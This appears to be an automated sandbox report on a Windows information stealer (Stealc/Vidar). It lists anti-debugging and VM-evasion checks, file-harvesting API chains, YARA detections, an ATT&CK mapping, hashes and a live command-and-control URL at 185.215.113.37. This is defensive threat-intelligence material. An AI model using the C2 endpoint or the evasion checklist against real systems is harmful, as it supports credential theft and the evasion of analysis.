                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51002B3 second address: 51002B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51002B7 second address: 51002BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51002BD second address: 5100300 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77EA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1770B77E9Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1770B77EA7h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100300 second address: 5100307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100364 second address: 510037F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770B77EA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510037F second address: 5100391 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 18149631h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100391 second address: 5100395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100395 second address: 51003AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F37A04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51003AD second address: 51003BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1770B77E9Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51003BF second address: 510043C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1770F379FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push esi 0x0000000e movsx ebx, cx 0x00000011 pop eax 0x00000012 mov cx, bx 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 mov ebx, 25F7A6C8h 0x0000001e mov eax, ebx 0x00000020 popad 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F1770F37A04h 0x0000002b adc esi, 6EEE2928h 0x00000031 jmp 00007F1770F379FBh 0x00000036 popfd 0x00000037 pushfd 0x00000038 jmp 00007F1770F37A08h 0x0000003d and ax, 5B88h 0x00000042 jmp 00007F1770F379FBh 0x00000047 popfd 0x00000048 popad 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3EF8A second address: D3EFA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1770B77EA3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F321 second address: D3F340 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1770F37A05h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3F340 second address: D3F345 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B91A4B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B91AEE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D3285E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B8F3AE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D46AE4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DBE9D4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00944910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00944910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0093DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0093E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0093ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00944570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00944570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093F68A FindFirstFileA,0_2_0093F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0093F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00943EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00943EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0093DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0093BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00931160 GetSystemInfo,ExitProcess,0_2_00931160
                Source: file.exe, file.exe, 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2257803413.0000000001154000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2257803413.0000000001124000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13406
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13409
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13428
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13420
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13460
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009345C0 VirtualProtect ?,00000004,00000100,000000000_2_009345C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00949860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00949860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00949750 mov eax, dword ptr fs:[00000030h]0_2_00949750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009478E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_009478E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2884, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00949600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00949600
                Source: file.exe, file.exe, 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: q2Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00947B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00947980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00947980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00947850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00947850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00947A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00947A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.930000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2216744474.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2884, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.930000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2216744474.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2884, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpNfile.exe, 00000000.00000002.2257803413.000000000115B000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37file.exe, 00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/#file.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpc%file.exe, 00000000.00000002.2257803413.000000000115B000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/wsfile.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpyfile.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/:file.exe, 00000000.00000002.2257803413.0000000001138000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37Sfile.exe, 00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.37
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1542004
                            Start date and time:2024-10-25 12:32:08 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 24s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 18
                            • Number of non-executed functions: 88
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Excluded IPs from analysis (whitelisted): 172.202.163.200
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.947697383002452
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'839'104 bytes
                            MD5:e5554752275f657385f52a9200ce5d65
                            SHA1:20111ab044d48a47dcd1240fd0b098f024c16bc4
                            SHA256:75c80ec13c3aae80d4eaf263e35ac39fdc644b4b4eb7fab66a4217354bd7e5fd
                            SHA512:e91029e1c65c3bf2be9a3f0c9d9e17ae96c382d9dbd48110055f40e05bf2121b3db2e00d762bed3b289a4d844ad251cbba78817ad759e58fd9cb717c0dacd6a6
                            SSDEEP:49152:MatHpe9XBzs4Klf6nO3TtwCncRoADt5P:MatHI9hsLx6OBwFj
                            TLSH:178533674C211A96D74808F74183D576E3726E3391FEA6B2A31CA2C97319E493BF18DC
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0xa95000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007F1770EEE8AAh
                            pmaxsw mm3, qword ptr [ebx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, ch
                            add byte ptr [eax], ah
                            add byte ptr [eax], al
                            add byte ptr [edx+ecx], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            aas
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [edx], ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add ecx, dword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add al, 0Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            and al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add eax, 0000000Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+0Ah], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            push es
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
